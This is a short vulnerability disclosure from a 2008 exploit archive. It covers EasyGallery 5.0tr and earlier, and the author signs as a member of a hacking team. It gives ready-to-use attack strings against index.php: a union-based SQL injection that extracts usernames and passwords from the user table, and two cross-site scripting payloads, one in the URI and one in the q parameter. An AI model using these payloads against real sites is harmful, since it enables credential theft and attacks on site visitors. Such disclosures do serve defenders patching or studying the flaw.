--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: EasyGallery [~] HomePage: http://myiosoft.com [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Verified in localhost with EasyGallery 5.0tr and magic_quotes Off [+] Remote SQL Injection: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL] [~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/* [+] Cross Site Scripting in URI: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS] [~] Example: >"> [+] Cross Site Scripting: [~] Vuln File: index.php [~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS] [~] Example: %22+onmouseover=alert("JosS")+ --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-03-12]